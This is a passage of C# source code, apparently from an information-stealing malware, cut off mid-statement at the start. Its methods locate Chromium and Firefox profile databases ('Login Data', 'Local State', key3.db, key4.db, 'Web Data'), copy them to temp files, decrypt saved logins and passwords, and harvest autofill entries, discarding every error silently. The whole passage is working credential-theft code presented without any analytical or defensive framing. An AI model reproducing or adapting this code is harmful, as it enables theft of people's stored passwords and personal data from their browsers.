"UNKNOWN" : text2) }; if (loginPair.Login != "UNKNOWN" && loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN") { list.Add(loginPair); } } if (flag) { File.Delete(path); } } catch (Exception) { } return(list); }
private static List <Autofill> EnumFills(string profilePath) { List <Autofill> list = new List <Autofill>(); try { string text = Path.Combine(profilePath, "Web Data"); if (!File.Exists(text)) { return(list); } SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text)); sqlConnection.ReadTable("autofill"); for (int i = 0; i < sqlConnection.RowLength; i++) { Autofill autofill = null; try { autofill = new Autofill { Name = sqlConnection.ParseValue(i, "name").Trim(), Value = sqlConnection.ParseValue(i, "value").Trim() }; } catch { } if (autofill != null) { list.Add(autofill); } } return(list); } catch { return(list); } }
private static List <LoginPair> GetCredentials(string profile) { List <LoginPair> list = new List <LoginPair>(); try { if (File.Exists(Path.Combine(profile, "key3.db"))) { list.AddRange(ParseLogins(profile, GetPrivate3Key(DecryptHelper.CreateTempCopy(Path.Combine(profile, "key3.db"))))); } if (!File.Exists(Path.Combine(profile, "key4.db"))) { return(list); } list.AddRange(ParseLogins(profile, GetPrivate4Key(DecryptHelper.CreateTempCopy(Path.Combine(profile, "key4.db"))))); return(list); } catch { return(list); } }
private static List <LoginPair> GetCredentials(string profilePath) { List <LoginPair> loginPairList = new List <LoginPair>(); try { string str = Path.Combine(profilePath, "Login Data"); if (!File.Exists(str)) { return(loginPairList); } string[] strArray = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State"); SqlConnection manager = new SqlConnection(DecryptHelper.CreateTempCopy(str)); manager.ReadTable("logins"); for (int row = 0; row < manager.RowLength; ++row) { LoginPair loginPair = new LoginPair(); try { loginPair = ChromiumEngine.ReadData(manager, row, localStatePath); } catch { } if (loginPair.Login.IsNotNull <string>() && loginPair.Login != "UNKNOWN" && (loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN")) { loginPairList.Add(loginPair); } } } catch { } return(loginPairList); }